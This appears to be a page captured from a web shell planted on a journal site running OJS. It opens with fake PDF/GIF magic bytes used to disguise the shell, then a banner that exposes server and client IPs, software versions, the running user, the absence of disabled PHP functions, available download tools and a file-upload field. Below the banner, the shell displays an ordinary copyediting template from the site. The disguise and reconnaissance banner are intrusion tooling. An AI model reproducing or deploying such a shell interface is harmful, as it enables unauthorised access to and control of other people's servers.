%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/PalarJournal/templates/author/submission/ |
Upload File : |
{**
* templates/author/submission/copyedit.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Subtemplate defining the copyediting table.
*
*}
<div id="copyedit">
<h3>{translate key="submission.copyediting"}</h3>
{if $useCopyeditors}
<table class="data" width="100%">
<tr>
<td class="label" width="20%">{translate key="user.role.copyeditor"}</td>
<td class="label" width="80%">{if $submission->getUserIdBySignoffType('SIGNOFF_COPYEDITING_INITIAL')}{$copyeditor->getFullName()|escape}{else}{translate key="common.none"}{/if}</td>
</tr>
</table>
{/if}
<table width="100%" class="info">
<tr>
<td width="40%" colspan="2"><a href="{url op="viewMetadata" path=$submission->getId()}" class="action">{translate key="submission.reviewMetadata"}</a></td>
<td width="20%" class="heading">{translate key="submission.request"}</td>
<td width="20%" class="heading">{translate key="submission.underway"}</td>
<td width="20%" class="heading">{translate key="submission.complete"}</td>
</tr>
<tr>
<td width="5%">1.</td>
{assign var="copyeditInitialSignoff" value=$submission->getSignoff('SIGNOFF_COPYEDITING_INITIAL')}
<td width="35%">{translate key="submission.copyedit.initialCopyedit"}</td>
<td>{$copyeditInitialSignoff->getDateNotified()|date_format:$dateFormatShort|default:"—"}</td>
<td>{$copyeditInitialSignoff->getDateUnderway()|date_format:$dateFormatShort|default:"—"}</td>
<td>{$copyeditInitialSignoff->getDateCompleted()|date_format:$dateFormatShort|default:"—"}</td>
</tr>
<tr>
<td> </td>
<td colspan="4">
{translate key="common.file"}:
{if $copyeditInitialSignoff->getDateCompleted() && $initialCopyeditFile}
<a href="{url op="downloadFile" path=$submission->getId()|to_array:$copyeditInitialSignoff->getFileId():$copyeditInitialSignoff->getFileRevision()}" class="file">{$initialCopyeditFile->getFileName()|escape}</a> {$initialCopyeditFile->getDateModified()|date_format:$dateFormatShort}
{else}
{translate key="common.none"}
{/if}
</td>
</tr>
<tr>
<td colspan="5" class="separator"> </td>
</tr>
<tr>
<td>2.</td>
{assign var="copyeditAuthorSignoff" value=$submission->getSignoff('SIGNOFF_COPYEDITING_AUTHOR')}
<td>{translate key="submission.copyedit.editorAuthorReview"}</td>
<td>{$copyeditAuthorSignoff->getDateNotified()|date_format:$dateFormatShort|default:"—"}</td>
<td>{$copyeditAuthorSignoff->getDateUnderway()|date_format:$dateFormatShort|default:"—"}</td>
<td>
{if not $copyeditAuthorSignoff->getDateNotified() or $copyeditAuthorSignoff->getDateCompleted()}
{icon name="mail" disabled="disabled"}
{else}
{url|assign:"url" op="completeAuthorCopyedit" articleId=$submission->getId()}
{translate|assign:"confirmMessage" key="common.confirmComplete"}
{icon name="mail" onclick="return confirm('$confirmMessage')" url=$url}
{/if}
{$copyeditAuthorSignoff->getDateCompleted()|date_format:$dateFormatShort|default:""}
</td>
</tr>
<tr>
<td> </td>
<td colspan="5">
{translate key="common.file"}:
{if $copyeditAuthorSignoff->getDateNotified() && $editorAuthorCopyeditFile}
<a href="{url op="downloadFile" path=$submission->getId()|to_array:$copyeditAuthorSignoff->getFileId():$copyeditAuthorSignoff->getFileRevision()}" class="file">{$editorAuthorCopyeditFile->getFileName()|escape}</a> {$editorAuthorCopyeditFile->getDateModified()|date_format:$dateFormatShort}
{else}
{translate key="common.none"}
{/if}
<br />
<form method="post" action="{url op="uploadCopyeditVersion"}" enctype="multipart/form-data">
<input type="hidden" name="articleId" value="{$submission->getId()}" />
<input type="hidden" name="copyeditStage" value="author" />
<input type="file" name="upload"{if not $copyeditAuthorSignoff->getDateNotified() or $copyeditAuthorSignoff->getDateCompleted()} disabled="disabled"{/if} class="uploadField" />
<input type="submit" class="button" value="{translate key="common.upload"}"{if not $copyeditAuthorSignoff->getDateNotified() or $copyeditAuthorSignoff->getDateCompleted()} disabled="disabled"{/if} />
</form>
</td>
</tr>
<tr>
<td colspan="5" class="separator"> </td>
</tr>
<tr>
<td>3.</td>
{assign var="copyeditFinalSignoff" value=$submission->getSignoff('SIGNOFF_COPYEDITING_FINAL')}
<td>{translate key="submission.copyedit.finalCopyedit"}</td>
<td>{$copyeditFinalSignoff->getDateNotified()|date_format:$dateFormatShort|default:"—"}</td>
<td>{$copyeditFinalSignoff->getDateUnderway()|date_format:$dateFormatShort|default:"—"}</td>
<td>{$copyeditFinalSignoff->getDateCompleted()|date_format:$dateFormatShort|default:"—"}</td>
</tr>
<tr>
<td> </td>
<td colspan="4">
{translate key="common.file"}:
{if $copyeditFinalSignoff->getDateCompleted() && $finalCopyeditFile}
<a href="{url op="downloadFile" path=$submission->getId()|to_array:$copyeditFinalSignoff->getFileId():$copyeditFinalSignoff->getFileRevision()}" class="file">{$finalCopyeditFile->getFileName()|escape}</a> {$finalCopyeditFile->getDateModified()|date_format:$dateFormatShort}
{else}
{translate key="common.none"}
{/if}
</td>
</tr>
<tr>
<td colspan="5" class="separator"> </td>
</tr>
</table>
{translate key="submission.copyedit.copyeditComments"}
{if $submission->getMostRecentCopyeditComment()}
{assign var="comment" value=$submission->getMostRecentCopyeditComment()}
<a href="javascript:openComments('{url op="viewCopyeditComments" path=$submission->getId() anchor=$comment->getId()}');" class="icon">{icon name="comment"}</a>{$comment->getDatePosted()|date_format:$dateFormatShort}
{else}
<a href="javascript:openComments('{url op="viewCopyeditComments" path=$submission->getId()}');" class="icon">{icon name="comment"}</a>{translate key="common.noComments"}
{/if}
{if $currentJournal->getLocalizedSetting('copyeditInstructions') != ''}
<a href="javascript:openHelp('{url op="instructions" path="copy"}')" class="action">{translate key="submission.copyedit.instructions"}</a>
{/if}
</div>